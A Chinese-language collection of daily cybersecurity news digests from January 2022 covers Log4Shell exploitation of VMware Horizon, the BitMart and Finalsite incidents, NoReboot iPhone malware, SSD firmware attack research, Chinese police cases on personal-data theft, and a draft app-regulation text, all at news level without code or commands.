  • Video.js (JavaScript, CVE-2021-23414)
  • Nagios XI (PHP, CVE-2021-37352)
  • Flask-security (Python, CVE-2021-23385)
  • Flask-security-too (Python, CVE-2021-32618)
  • Flask-unchained (Python, CVE-2021-23393)
  • Flask-User (Python, CVE-2021-23401)
  • Clearance (Ruby, CVE-2021-23435)

“许多现实生活中的攻击场景可能来自不同的解析原语,”研究人员说。为了保护应用程序不受 URL 解析漏洞的影响,“有必要充分了解是什么解析器参与了整个过程,解析器之间的区别,它们如何解释不同的错误 URL,以及它们支持什么类型的 URL。”

【阅读原文】



2、IRISA开发新型恶意软件检测系统 通过树莓派探测特定电磁波


计算机科学与随机系统研究所(IRISA)的一支研究团队,刚刚介绍了其新开发的一套恶意软件检测系统,特点是利用树莓派来扫描设备中的特定电磁波。团队成员中宝库了 Annelie Heuser、Matthieu Mastio、Duy-Phuc Pham 和 Damien Marion,且由于这套装置专注于电磁(EM)信号,因而无需在目标设备上安装任何东西。

(图自:IRISA)


换言之,这套恶意软件检测方案的一切工作,都可通过外部实体来处理,因而不受给定机器上潜在恶意软件的任意控制级别的影响。


不过为了达成这一目标,IRISA 研究团队还是让树莓派接受了安全与恶意数据集的专项训练,以帮助定义潜在的威胁参数。


此外树莓派上配备了一个 Picoscope 6407 示波器、以及一个 H-Field 探头,用于检测电磁(EM)场的变化。

(传送门:ACM Digital Library


在《于混淆中揭露:利用电磁信号开展恶意软件分类工作》的研究论文中,IRISA 团队介绍了如何利用卷积神经网络(CNN)来评估相关数据威胁。

结果让人相当欣喜,可知经过训练的恶意软件检测系统模型,能够在测试期间实现高达 99.82% 的准确率。

【阅读原文】



3、Check Point安全报告显示去年企业受到的总体网络攻击量有明显增加


网络安全公司Check Point Research发布了2021年的新数据,显示在他们的客户中,与2020年相比,企业网络每周受到的总体网络攻击有明显增加。研究人员将一些集中在年底的攻击增长归因于12月发现的Log4j漏洞。


Check Point在一份报告中表示,2021年是网络攻击创纪录的一年,Log4j漏洞只会让事情变得更糟。去年与2020年相比,每周对企业网络的网络攻击增加了惊人的50% ,这是一个显著的增长。网络攻击的数字在年底达到高峰,主要是由于Log4j漏洞的利用尝试导致。


新的渗透技术和规避方法使黑客更容易执行恶意意图。最令人震惊的是,一些举足轻重的社会行业涌入受攻击最多的名单。教育、政府和医疗行业进入了全球最受攻击行业的前五名。Check Point发现,就2021年而言,每周对企业网络的总体攻击比2020年增长了50%,在第四季度,他们看到每个组织每周受到的网络攻击达到了925次,创下历史新高。


Check Point在教育和研究领域的客户每周平均每个组织处理1605次攻击,这是他们看到的最高攻击量。与2020年相比,这一数字增加了75%。政府、国防、军事和通信行业也不甘落后,每个组织每周平均约有1100次攻击。当Check Point把内部数据按地区细分时,他们发现非洲大陆的组织在2021年看到了最高的攻击量,每个组织平均每周受到1582次攻击。亚太地区的组织平均每周受到1353次攻击,而拉丁美洲每周受到1118次攻击,欧洲每周受到670次攻击。北美地区排在最后,每周平均为503次。


Check Point的数字是基于其内部的ThreatCloud工具,该工具从全球数以亿计的传感器中提取数据。Check Point预计2022年的数字会增加,因为黑客继续创新并找到执行网络攻击的新方法,特别是在赎金软件方面。

【阅读原文】



2022年1月11日 星期二

今日资讯速览:

1、瑞士军队要求其人员使用 Threema 即时通讯应用程序


2、BitMart承诺向黑客攻击事件的受害者提供补偿 但一些用户仍未拿回资金


3、恶意软件可令iPhone假装关机并监控用户隐私



1、瑞士军队要求其人员使用 Threema 即时通讯应用程序


瑞士军队已经禁止了 Signal、Telegram 和 WhatsApp 等外国即时通讯应用,只允许其成员使用在瑞士开发的 Threema 即时通讯应用。


Threema 是即时通讯工具,旨在生成尽可能少的用户数据。所有通信都是端到端加密的,并且该应用程序是开源的。Threema 不要求用户在注册时提供电话号码或电子邮件地址,这意味着无法通过这些数据链接用户的身份。



该应用程序可以在支付一次订阅后使用,该公司表示这笔款项涵盖了 Threema 应用程序的开发和服务器基础设施的维护。


瑞士军队将支付其人员的年度订阅费用。


“在军队中,它现在被称为:Threema for everyone – Threema pour tous – Threema per tutti。考虑到这一点,陆军参谋部在 12 月底发送了一封电子邮件,指示所有指挥官和参谋长从现在开始使用 Threema messenger 应用程序与私人智能手机进行商务沟通。” 瑞士 Tagesanzeiger 报道。“在本报的信中,它说:« 不再允许所有其他服务。“未来,军队将禁止其亲属通过 Whats 应用程序、信号或电报相互交换信息,并禁止通过这些渠道传播官方指示。”


最近,媒体分享了一份 FBI 培训文件,该文件揭示了美国执法部门的监控能力,详细说明了可以从加密的消息传递应用程序中提取哪些数据。


该文件分析了对多个加密消息应用程序的合法访问,包括 iMessage、Line、Signal、Telegram、Threema、Viber、WhatsApp、微信或 Wickr。




上述文件日期为 2021 年 1 月 7 日,是通过美国非营利组织 Property of the People 提交的 FOIA 请求获得的。


培训文件中报告的信息提供了执法部门访问流行消息应用程序内容的能力的最新情况。


联邦调查局无法访问 Signal、Telegram、Threema、Viber、WeChat 和 Wickr 的消息内容,而他们可以有限地访问来自 iMessage、Line 和 WhatsApp 的加密通信内容。


无论如何,根据单个加密消息应用程序,执法部门可以提取不同的元数据,从而可以揭露最终用户的身份。


瑞士官员还指出,Threema 不受美国云法案的约束,该法案适用于所有在美国运营的电子通信服务或远程计算服务提供商 


“美国于 2018 年 3 月颁布了《澄清合法海外数据使用 (CLOUD) 法案》,以加快访问美国全球供应商持有的电子信息,这些信息对我们的外国合作伙伴调查恐怖主义和暴力等严重犯罪至关重要对儿童的性剥削和网络犯罪。” 声明美国云法案。“CLOUD 法案旨在允许我们对隐私和公民自由有强有力保护的外国合作伙伴与美国签订双边协议,以直接访问这些电子证据,无论它位于何处,以对抗严重的犯罪和恐怖主义。”


作为 Threema 的用户,Steiger 补充说,瑞士军队的行动方向是正确的,但不会一路走好。


奇怪的是,瑞士军队要求军事人员将 Threema 用作私人用户,而不是使用名为 Threema Work 的商业版本。


————————————————

原文作者:全球网络安全资讯

转自链接:https://www.wangan.com/p/7fy7fg97147d143e

版权声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请保留以上作者信息和原文链接。



2、BitMart承诺向黑客攻击事件的受害者提供补偿 但一些用户仍未拿回资金


据CNBC报道,加密货币交易所BitMart此前承诺向全平台2亿美元黑客攻击事件的受害者提供全额补偿,但一些用户仍未拿回他们的钱。12月4日,黑客利用盗取的隐私密钥进入BitMart的一个热钱包,也就是连接到互联网上的加密货币钱包,然后盗取了各种代币。

事件发生后不久,BitMart宣布,它将使用自己的资金“来支付这一事件并赔偿受影响的用户”。然而,据CNBC报道,仍有一些沮丧的用户尚未看到他们的资金返回。


CNBC的报道详细介绍了一位伊朗难民的经历,他说他在BitMart上存储了价值53000美元的SafeMoon,其中40000美元是来自贷款。该媒体还与一位堪萨斯州的投资者取得了联系,他有3.5万美元的资金处于停滞状态--他声称,如果不采取任何措施来解决这一情况,他和其他6800名投资者可能会对BitMart提起集体诉讼。

在BitMart黑客攻击中被盗的所有代币中,区块链安全公司PeckShield的数据显示,SafeMoon受到的冲击最大。正如CNBC所指出的,SafeMoon的持有者正在Twitter上进行反击,并在网站上充斥着#WenBitMart的标签,要求归还他们的资金。这可能是用户认为他们可以呼吁关注这个问题的唯一方式,因为CNBC报道说,一些用户在联系BitMart检查他们丢失的资金的状态时,没有得到明确的回应。


目前还不清楚BitMart计划如何补偿所有受影响的用户。CNBC指出,虽然该交易所可以买回所有丢失的代币,但它可能会在这些代币处于更高的价值时这样做。其他用户质疑BitMart是否会使用某种形式的保险来偿还用户。The Verge向BitMart提出了评论请求,但没有立即得到回复。

【阅读原文】



3、恶意软件可令iPhone假装关机并监控用户隐私







国外安全人员ZecOps近日开发了一项名为NoReboot的技术,可以让iPhone实现伪装关机,并且偷窃用户隐私。这项技术模拟了用户关机/重启的情景,来电铃声和信息通知、3D Touch、震动、屏幕、相机指示灯等物理反馈也会被禁用,同时还会伪造Apple的经典开关机动画来误导用户以为已经完成了操作,但实际上还在联网状态中。


在“假关机”状态下,攻击者可悄悄远程访问用户手机的麦克风和摄像头,或者在不提醒用户的情况下做几乎任何他们想做的事情。


通常情况下,重启iPhone可直接清除恶意软件的劫持代码。但是,NoReboot技术可在iPhone恢复开机状态时直接进行劫持,所以用户即便“真重启”也无济于事。


“NoReboot”的工作原理是将恶意代码注入InCallService、SpringBoard和backboardd这三个后台进程,它们负责iPhone的重新启动过程。

ZecOps表示,此问题无法通过补丁修复,并且可运行在任何iOS版本的iPhone上。


【阅读原文】



2022年1月10日 星期一

今日资讯速览:

1、NHS 警告黑客攻击 VMware Horizon 中的 Log4j 缺陷


2、软件供应商Finalsite遭勒索软件攻击 全美4500所学校受影响


3、公安部公布去年侵犯公民个人信息犯罪十大典型案例



1、NHS 警告黑客攻击 VMware Horizon 中的 Log4j 缺陷


英国国家卫生服务局 (NHS) 的数字安全团队已就未知威胁者主动利用未修补 VMware Horizon 服务器中的 Log4Shell 漏洞以投放恶意 Web Shell 并在受影响的网络上建立持久性以进行后续攻击发出警报。


“攻击可能包括一个侦察阶段,攻击者通过 Log4Shell 有效负载使用 Java 命名和目录接口 (JNDI) 回调恶意基础设施,” 非部门公共机构在警报中说。“一旦发现漏洞,攻击就会使用轻量级目录访问协议 (LDAP) 检索并执行恶意 Java 类文件,该文件将 Web shell 注入 VM Blast 安全网关服务。”


Web Shell 部署后,可以作为执行大量利用后活动的渠道,例如部署额外的恶意软件、数据泄露或部署勒索软件。VMware Horizon 版本 7.x 和 8.x 容易受到 Log4j 漏洞的攻击。


Log4Shell 是利用用于 CVE-2021-44228(CVSS 分数:10.0),在 Apache 中的 Log4j 2,无处不在的开源日志框架,这已经投入使用作为其一部分的一个关键任意远程执行代码缺陷不同的恶意软件的广告活动,因为它于 2021 年 12 月被曝光。迄今为止,从民族国家行为者到勒索软件卡特尔的一系列黑客组织已经攻击了该漏洞。


该开发还标志着 VMware 产品第二次因 Log4j 库中的漏洞而受到利用。上个月,AdvIntel 研究人员披露,攻击者瞄准运行 VMware VCenter 服务器的系统,目的是安装 Conti 勒索软件。


就其本身而言,VMware 上个月已经发布了 Horizon、VCenter 和其他受 Log4Shell 影响的产品的安全更新,虚拟化服务提供商承认在野外进行扫描尝试,并敦促客户在适用或适用的情况下安装补丁临时解决方法以应对任何潜在风险。


————————————————

原文作者:全球网络安全资讯

转自链接:https://www.wangan.com/p/7fy7fg4bb7693f57

版权声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请保留以上作者信息和原文链接。



2、软件供应商Finalsite遭勒索软件攻击 全美4500所学校受影响


软件提供商Finalsite的发言人7日证实,该公司遭到勒索软件的攻击,影响了大约5000所学校的网站,其中约有4500所美国的学校受影响。据报道,Finalsite总部位于美国康涅狄格州。据该公司介绍,包括寄宿学校、高中和大学在内,全球约有8000所学校使用该公司的软件用于其网站和公共通信。


“我们大多数学校的网站今天早上都重新上线了。”该公司发言人摩根·德拉克表示,“目前,我们没有任何证据表明数据已被泄露。”


该公司表示,其4日在其部分计算机系统上发现了勒索软件。


“(我们)在看到问题后决定关闭我们的网络,并在干净的环境中重建了一切。”德拉克说,“我们拥有所有客户的数据。”


德拉克说,约有4500所美国的学校受影响。


除了Finalsite等通信平台外,在新冠疫情期间,勒索软件攻击还曾造成美国许多学校的远程学习被迫中断。


据网络安全公司EMSIsoft称,在过去三年中,美国每年都有超过一千所K-12学校遭到勒索软件破坏。


政府问责办公室GAO呼吁美国教育部采取更多措施保护学校免受黑客攻击。该办公室2021年11月发布的一份报告指出,教育部“缺乏基于当前对教育领域面临的网络安全风险评估的最新计划”。

【阅读原文】



3、公安部公布去年侵犯公民个人信息犯罪十大典型案例


全国公安机关深入推进“净网2021”专项行动,针对人民群众关注的个人信息保护问题,全力组织侦查打击,共破获侵犯公民个人信息案件9800余起,抓获犯罪嫌疑人1.7万余名,有力维护了网络空间秩序和人民群众合法权益。2022年1月8日,公安部公布了去年侵犯公民个人信息犯罪十大典型案例。


何某非法获取医疗、出行、快递等公民个人信息数十亿条案。江苏公安网安部门侦查查明,犯罪嫌疑人何某利用为相关单位、企业建设信息系统之机,非法获取医疗、出行、快递等公民个人信息数十亿条,搭建对外提供非法查询服务的数据库,通过暗网发布广告招揽客户,出售谋取不法利益。


徐某等人利用外挂程序非法获取公民个人信息案。湖北公安网安部门侦查查明,武汉某公司工作人员徐某等人,利用李某编写的多款外挂程序,通过系统接口漏洞,窃取酒店、燃气、医疗健康等33个网站后台公民个人信息3000余万条用于债务催收等。


吴某等人非法获取老年人个人信息推销虚假保健品案。安徽公安网安部门侦查查明,犯罪嫌疑人吴某成立多家健康咨询公司,通过网上购买、交换有保健品购买记录的老年人信息200余万条,通过制定话术、夸大效果推销虚假保健品,骗取6万余名老年人1500余万元。


关某等人非法获取电信用户上网标签数据2亿余条贩卖。江苏公安网安部门侦查查明,犯罪嫌疑人关某利用多个空壳公司与多家电信运营商签订合同,非法获取电信用户手机上网标签数据2亿余条,按照地域、行业等分类后,向下游精准营销人员和电信网络诈骗犯罪人员贩卖牟利。


谢某等人利用木马窃取网民购物信息案。福建公安网安部门侦查查明,犯罪嫌疑人谢某诱骗某电商平台店铺客服点击木马链接,窃取200余家店铺的买家个人信息1000余万条,向林某等人层层贩卖,最终流向电信网络诈骗团伙。


石某等人非法获取公民信息注册游戏账号并向未成年人出售案。辽宁公安网安部门侦查查明,山东某网络科技公司从网上购买公民信息,在辽宁阜新石某团伙的技术支撑下,突破游戏公司验证机制,非法注册实名网络游戏账号1.8万余个,向未成年人出售,非法牟利170余万元。


某艺术品策划公司非法获取公民个人信息诈骗牟利1.9亿案。广东公安网安部门侦查查明,珠海某艺术品策划公司从某APP维护人员汪某处购买APP在运营过程中获取的古董持有人员个人信息200万余条,以协助拍卖古董为名,骗取客户服务费、托管费,非法牟利1.9亿余元。该公司员工邝某、黄某为谋取私利,将公司非法获取的个人信息向其他电信网络诈骗团伙贩卖。


某公司发布免费领取保健品等虚假信息非法获取公民个人信息案。江苏公安网安部门侦查查明,某公司非法搭建5300余个虚假网站,冒用其他公司资质在某自媒体平台发布免费领取男科用药、白酒、保健品等虚假信息,引流至其所建虚假网站,骗取网民的姓名、手机号、收货地址等公民个人信息110余万条并贩卖牟利。

团伙应聘快递公司偷拍快递面单非法获取公民快递信息案。浙江公安网安部门侦查查明,犯罪嫌疑人李某指使团伙成员应聘多家快递公司临聘人员,利用整理快递包裹之机,偷拍快递面单2万余张,汇总整理后在网上贩卖。


张某等人制作远程控制软件非法获取公民个人信息案。江苏公安网安部门侦查查明,犯罪嫌疑人张某搭建服务器制作远程控制软件,出售给他人安装在受害人手机上,非法获取受害人手机的位置、通话记录等,涉及手机1.1万余台。


公安机关网安部门将会同有关部门,认真贯彻落实《刑法》和《个人信息保护法》《数据安全法》等法律法规,完善打击危害公民个人信息和数据安全违法犯罪长效机制,做好源头防控,持续保持严打高压态势。警方提醒大家,个人信息关系到每个人的合法权益和生命财产安全,保护自己和他人的个人信息安全人人有责。一旦发现个人信息被泄露,要及时向公安机关报案。实施侵犯公民个人信息违法犯罪,必将受到法律严惩。

【阅读原文】



2022年1月7日 星期五

今日资讯速览:

1、美国两家公司牵手推全球首个量子计算机生成的加密密钥服务


2、新固件攻击可在 SSD 硬盘投放持久性恶意软件


3、2021年加密货币相关犯罪创新高 规模达惊人140亿美元



1、美国两家公司牵手推全球首个量子计算机生成的加密密钥服务


美国两家量子公司联手,将推出全球首个由量子计算机生成的量子加密密钥服务。美国得克萨斯州中部时间2022年1月5日,量子计算软件企业Strangeworks公司宣布与全球最大的综合性独立量子计算公司Quantinuum联合推出前述服务。Quantinuum拥有垂直整合的解决方案,包括最高性能的量子计算机以及全面的量子软件。


这项合作中,Quantinuum公司的量子增强型密码密钥——Quantum Origin,将为Strangeworks公司的生态系统提供先进的密码功能。它将成为Strangeworks公司生态系统的重要组成部分,为用户提供无缝访问、卓越的加密密钥,并帮助抵御当前的安全威胁。


Quantum Origin是世界首个使用量子计算机生成加密密钥的商业产品,以保护数据免受不断增长的网络安全威胁。该产品由Quantinuum的全资子公司剑桥量子公司(CQ)在2021年12月推出。


Quantum Origin作为一个云托管平台,利用量子力学不可预测的特性,通过霍尼韦尔公司(Honeywell)技术支持的Quantinuum公司H列量子计算机来提供可验证的量子随机性,生成加密密钥。它支持传统算法,如RSA或AES加密算法,以及目前由美国国家标准与技术研究院(NIST)标准化的后量子密码算法(PQC)。由Quantum Origin生成的量子增强密钥基于可验证的量子随机性,可以集成到现有系统中。该协议依赖于量子纠缠,这是量子力学的一个独特特征。

量子的随机性对于确保当前的安全解决方案,以及保护系统未来免受量子攻击至关重要。这些攻击将进一步削弱随机数生成器(RNG)的确定性方法,以及量子的非可验证的随机方法。


今天的网络系统大多受到加密算法的保护,比如RSA和AES。这些加密算法主要基于“无法被破解的”、来自随机数生成器(RNG)的长字符串。然而,今天的RNG缺乏真实的、可验证的随机性,生成的数量也并不像想象的那么不可预测。因此,这类RNG已经成为越来越多网络攻击的目标。


除此之外,量子攻击的潜在威胁进一步加大了网络安全风险,刺激了犯罪分子通过先窃取经过互联网的加密数据,然后用量子计算机将其解密,也就是所谓的“先黑入后解密”(“hack now, decrypt later”)攻击。


“Strangeworks将扩大其行业领先的平台,包括量子技术,以帮助抵御当今的网络威胁,这是非常合适的,”Quantinuum和剑桥量子公司的网络安全主管Duncan Jones说。“我们很高兴能够整合Quantum Origin,基于可验证的量子随机性为Strangeworks和客户生成最强大的密码密钥。”


Strangeworks表示,作为世界领先的量子服务提供商,其不断为客户和Quantum Syndicate成员提供最新的基于量子技术的安全产品,并通过生态系统进行连接。由于现有的各种量子系统和用户的数据共享,启用最新的网络安全技术非常重要。通过实施Quantum Origin,Strangeworks将成为世界首个为量子计算生态系统实施量子生成的加密密钥无缝路径的公司。


Strangeworks公司创始人兼首席执行官William Hurley

“我们很高兴Quantinuum公司加入Quantum Syndicate。”Strangeworks公司创始人兼首席执行官William Hurley表示:”将我们的量子管理服务扩展到网络安全领域,是对我们企业产品的自然补充。与Quantum Origin的整合使世界各地的企业能够通过无缝路径,来获得量子生成的加密密钥来保护他们的敏感数据。“责任编辑:李跃群

【阅读原文】



2、新固件攻击可在 SSD 硬盘投放持久性恶意软件



近日,韩国研究人员针对某些固态驱动器 ( SSD ) 模拟了一系列攻击,这些攻击可能允许将恶意软件植入用户和安全解决方案都无法触及的位置。攻击模型针对具有灵活容量功能的驱动器,并针对设备上称为过度配置的隐藏区域——如今 SSD 制造商广泛使用该区域来优化基于 NAND 闪存的存储系统性能。硬件级攻击提供终极持久性和隐蔽性。过去,高级攻击者一直在努力尝试针对机械硬盘的此类攻击方法,将恶意代码隐藏在无法访问的磁盘扇区中。


SSD 工作原理

弹性容量是 SSD 中的一项功能,它使存储设备能够自动调整原始空间和用户分配空间的大小,通过吸收写入工作负载量来实现更好的性能。它是一个动态系统,可以创建和调整称为过度配置的空间缓冲区,通常占用总磁盘容量的 7% 到 25% 。当用户启动不同的应用程序时, SSD 管理器会根据工作负载自动调整此空间,具体取决于它们的写入或读取密集程度。操作系统和在其上运行的任何应用程序(包括安全解决方案和防病毒工具)都无法看到超额配置区域。


SSD 攻击模型

首尔高丽大学研究人员模拟攻击针对的是一个无效数据区域,该区域具有位于可用 SSD 空间和预留空间 ( OP ) 区域之间的未擦除信息,其大小取决于两者。其研究论文解释说,黑客可以通过使用固件管理器来更改 OP 区域的大小,从而产生可利用的无效数据空间。这里的问题是,很多 SSD 厂商为了节省资源,选择不擦除无效数据区。在假设断开映射表链接足以防止未经授权访问的情况下,该空间会在很长一段时间内保持充满数据。因此,利用此弱点的威胁行为者可以访问潜在敏感信息。


图片


研究人员指出 ,对 NAND 闪存进行数字取证可以发现过去六个月未被删除的(无效数据区)数据。在另一种攻击模型中,威胁参与者将 OP 区域用作用户无法监控或擦除的秘密位置,并在其中隐藏恶意软件。


图片


其研究论文将这种攻击描述为:假设两个存储设备 SSD1 和 SSD2 连接到一个通道。每个存储设备都有 50% 的 OP 区域。黑客将恶意代码存储到 SSD2 后,立即将 SSD1 的 OP 面积缩小到 25% ,将 SSD2 的 OP 面积扩大到 75% 。此时,恶意软件代码包含在 SSD2 的隐藏区域中。获得 SSD 访问权限的黑客可以随时通过调整 OP 区域大小来激活嵌入的恶意软件代码。由于普通用户在频道上保持 100% 的用户区域,因此黑客的这种恶意行为并不容易被发现。


这种攻击的明显优势在于它是隐蔽的。在 OP 区域检测恶意代码不仅耗时,而且需要高度专业化的取证技术。


防御对策

作为对第一种攻击的防御,研究人员建议 SSD 制造商使用不会影响实时性能的伪擦除算法擦除 OP 区域。对于第二种攻击,防止在 OP 区域注入恶意软件的潜在有效安全措施是实施有效-无效数据速率监控系统,实时观察 SSD 内部的比率。当无效数据比例突然显著增加时,用户可以得到警告并在 OP 空间选择可验证的数据擦除功能。


最后, SSD 管理应用程序应该具有强大的防御能力,对未经授权的访问采取防御措施。研究人员进一步解释说:“即使不是恶意黑客,被误导的员工也可以随时通过使用 OP 区域变量固件/软件轻松释放隐藏信息并泄漏它”。虽然研究表明 SSD 上的 OP 区域可用于存储恶意软件,但目前不太可能在野外发生此类攻击。


相关论文:https://arxiv.org/ftp/arxiv/papers/2112/2112.13923.pdf

【阅读原文】



3、2021年加密货币相关犯罪创新高 规模达惊人140亿美元


时间已正式迈入 2022 年,分析公司 Chainalysis 表示在过去一年中与加密货币有关的犯罪达到了历史最高水平,非法地址获得了惊人的 140 亿美元。收到的绝大部分资金是通过诈骗、盗窃和暗网市场获得的,而另一个不断增长的被盗资金来源则是赎金。


非法资金从 2020 年的 78 亿美元增长到 2021 年的 140 亿美元,而且同期的加密货币总交易量增长了 567%。有了这些统计数据,Chainalysis 表示,非法活动在加密货币交易量中的份额从未降低过。


据该分析公司称,流行的诈骗技术类型之一是地毯式诈骗(rug pulls)。它说这种类型的骗局是相当新的,涉及开发商建立一个看似合法的加密货币项目,拿着投资者的钱,然后干脆带着钱消失了。Thodex 是去年的一个大型平台,其首席执行官在阻止资金提取后带着客户的钱消失了。


与银行业务不同的是,在银行业务中,客户享有大量的保护,免受诈骗,而持有加密货币的风险更大。首先,在大多数情况下,你必须持有私钥,如果你失去了它,你就会失去对加密货币的访问。其次,如果你真的被黑客攻击或诈骗,在大多数情况下,没有人可以取回你的资金。


【阅读原文】



2022年1月6日 星期四

今日资讯速览:

1、国家网信办发布《移动互联网应用程序信息服务管理规定(征求意见稿)》


2、葡萄牙最大媒体集团遭勒索软件攻击,网站瘫痪


3、中国首个互联网货运安全运营标准发布



1、国家网信办发布《移动互联网应用程序信息服务管理规定(征求意见稿)》


国家互联网信息办公室关于《移动互联网应用程序信息服务管理规定(征求意见稿)》公开征求意见的通知


为了进一步规范移动互联网应用程序信息服务管理,促进行业健康有序发展,保障公民、法人和其他组织的合法权益,营造清朗网络空间,根据《中华人民共和国网络安全法》《中华人民共和国数据安全法》《中华人民共和国个人信息保护法》《互联网信息服务管理办法》《网络信息内容生态治理规定》等法律规定,国家互联网信息办公室对2016年8月1日正式施行的《移动互联网应用程序信息服务管理规定》进行了修订,现向社会公开征求意见。

公众可将反馈意见通过电子邮件方式发送至:yycxxd@cac.gov.cn,意见反馈截止时间为2022年1月20日。


附件:《移动互联网应用程序信息服务管理规定(征求意见稿)》


国家互联网信息办公室

2022年1月5日



移动互联网应用程序信息服务管理规定

(征求意见稿)


第一章 总 则

第一条 为了规范移动互联网应用程序信息服务,保护公民、法人和其他组织的合法权益,维护国家安全和公共利益,根据《中华人民共和国网络安全法》《中华人民共和国数据安全法》《中华人民共和国个人信息保护法》《中华人民共和国未成年人保护法》《互联网信息服务管理办法》《互联网新闻信息服务管理规定》《网络信息内容生态治理规定》等法律规定,制定本规定。

第二条 在中华人民共和国境内通过移动互联网应用程序(以下简称应用程序)提供信息服务,从事互联网应用商店等应用程序分发服务,应当遵守本规定。

本规定所称应用程序信息服务是指通过应用程序向用户提供文字、图片、语音、视频等信息制作、复制、发布、传播等服务的活动,包含即时通讯、新闻资讯、知识问答、论坛社区、网络直播、电子商务、网络音视频、生活服务等信息服务类型。

本规定所称从事互联网应用商店等应用程序分发服务是指通过互联网向用户提供应用程序发布、下载、动态加载等服务的活动,包含应用商店、快应用、互联网小程序、浏览器插件等平台分发服务类型。

第三条 国家互联网信息办公室负责全国应用程序信息内容的监督管理执法工作。地方互联网信息办公室依据职责负责本行政区域内应用程序信息内容的监督管理执法工作。

第四条 应用程序提供者和应用程序分发平台应当遵守宪法、法律和行政法规,遵循公序良俗,履行社会责任,坚持正确政治方向、舆论导向和价值取向,弘扬社会主义核心价值观,发展积极健康的网络文化,维护清朗网络空间,丰富人民精神文化生活,促进社会文明进步。

应用程序提供者和应用程序分发平台不得利用应用程序从事危害国家安全、扰乱社会秩序、侵犯他人合法权益等法律法规禁止的活动。

第五条 应用程序提供者和应用程序分发平台应当履行信息内容管理主体责任,建立健全信息内容安全管理、信息内容生态治理、网络数据安全、个人信息保护、未成年人保护等管理制度,确保信息内容安全,营造良好网络生态,强化用户权益保护。


第二章 应用程序提供者

第六条 应用程序为用户提供信息发布、即时通讯等服务的,应当对申请注册的用户进行基于移动电话号码、身份证件号码或者统一社会信用代码等方式的真实身份信息认证。用户不提供真实身份信息,或者冒用组织机构、他人身份信息进行虚假注册的,不得为其提供相关服务。

第七条 应用程序提供者通过应用程序提供互联网新闻信息服务,应当取得互联网新闻信息服务许可,禁止未经许可或者超越许可范围开展互联网新闻信息服务活动。

提供其他互联网信息服务,依法须经有关主管部门审核同意或者取得相关许可的,经有关主管部门审核同意或者取得相关许可后方可提供服务。

第八条 应用程序提供者应当制定并公开管理规则和平台公约,与注册用户签订服务协议,明确双方相关权利义务,要求注册用户遵守本规定及相关法律法规。

第九条 应用程序提供者应当建立健全信息内容审核管理机制,建立完善用户注册、账号管理、信息审核、日常巡查、应急处置等管理措施,配备与服务规模相适应的专业人员和技术能力。

对违反相关法律法规及服务协议的注册用户,应用程序提供者应当依法依约采取警示、限制功能、关闭账号等处置措施,保存记录并向有关主管部门报告。

第十条 应用程序提供者应当规范经营管理行为,不得通过虚假宣传、捆绑下载等行为,或者利用违法和不良信息诱导用户下载,不得通过机器或人工方式刷榜、刷量、控评,营造虚假流量。

第十一条 应用程序应当符合网络安全相关国家标准的强制性要求。应用程序提供者发现其应用程序存在安全缺陷、漏洞等风险时,应当立即采取补救措施,按照规定及时告知用户并向有关主管部门报告。

第十二条 开展应用程序数据处理活动,应当履行数据安全保护义务,建立健全全流程数据安全管理制度,采取保障数据安全技术措施和其他安全措施,加强风险监测,不得危害国家安全、公共利益,不得损害个人、组织的合法权益。

第十三条 从事应用程序个人信息处理活动应当遵循合法、正当、必要和诚信原则,具有明确、合理的目的并公开处理规则,遵守必要个人信息范围的有关规定,规范个人信息处理活动,采取必要措施保障个人信息安全,不得以任何理由强制要求用户同意非必要的个人信息处理行为,不得因用户不同意提供非必要个人信息,而拒绝用户使用其基本功能服务。

第十四条 应用程序提供者应当坚持最有利于未成年人的原则,关注未成年人健康成长,履行未成年人网络保护各项义务,严格落实未成年用户账号实名注册和登录要求,不得以任何形式向未成年用户提供诱导其沉迷的相关产品和服务。

第十五条 应用程序提供者上线具有舆论属性或者社会动员能力的新技术、新应用、新功能,应当按照国家有关规定进行安全评估。


第三章 应用程序分发平台

第十六条 应用程序分发平台应当在业务上线运营三十日内向所在地省、自治区、直辖市互联网信息办公室备案。办理备案时,应当提交以下材料:

(一)平台运营主体基本情况;

(二)平台名称、域名、接入服务、服务资质、上架应用程序类别等信息;

(三)平台取得的经营性互联网信息服务许可或者非经营性互联网信息服务备案等材料;

(四)本规定第五条要求建立健全的相关制度文件;

(五)平台管理规则、公约、服务协议等。

省、自治区、直辖市互联网信息办公室对备案材料的真实性、完备性进行审核,符合条件的应当予以备案。

国家互联网信息办公室向社会公布已经履行备案手续的应用程序分发平台名单。

第十七条 应用程序分发平台应当建立分类管理制度,对上架的应用程序实施分类管理,并将应用程序向应用程序分发平台所在地省、自治区、直辖市互联网信息办公室备案。

第十八条 应用程序分发平台应当采取复合验证等措施,对申请上架的应用程序提供者进行基于移动电话号码、身份证件号码或者统一社会信用代码等多种方式相结合的真实身份信息认证。根据应用程序提供者的不同主体性质,公示提供者名称、统一社会信用代码等信息。

第十九条 应用程序分发平台应当对申请上架和更新的应用程序名称、图标、简介、信息服务、个人信息收集使用行为等进行审核,发现与注册主体真实身份信息不相符的,特别是违规使用党和国家形象标识或者假冒国家机关名义的,不得为其提供服务;发现含有违法违规和不良信息的,存在数据安全风险隐患、违法违规收集使用个人信息行为的,或者损害个人、组织合法权益的,应当停止提供服务。

应用程序提供的信息服务属于本规定第七条规定范围的,应用程序分发平台应当对相关许可等情况进行核验;属于本规定第十五条规定范围的,应用程序分发平台应当对安全评估情况进行核验。未通过核验的,应当停止提供服务。

第二十条 应用程序分发平台应当建立应用程序监测评估机制,提升技术能力和管理效能,坚决打击网络黑灰产,防范下载量、评价指标等数据造假行为,不得以虚构下载量、编造评价等方式进行虚假宣传。

第二十一条 应用程序分发平台应当与应用程序提供者签订服务协议,明确双方相关权利义务,并依法依约履行管理责任。

应用程序分发平台应当建立健全管理和技术措施,及时发现防范应用程序违法违规行为。

对违反相关法律法规及服务协议的应用程序,应用程序分发平台应当依法依约采取警示、暂停服务、下架等处置措施,保存记录并向有关主管部门报告。


第四章 监督管理

第二十二条 应用程序提供者和应用程序分发平台应当自觉接受社会监督,设置醒目、便捷的投诉举报入口,公布投诉举报方式,健全受理、处置、反馈等机制,及时处理公众投诉举报。

第二十三条 鼓励互联网行业组织建立健全行业自律机制,制定完善行业规范和自律公约,指导会员单位建立健全服务规范,依法依规提供信息服务,维护市场公平,促进行业健康发展。

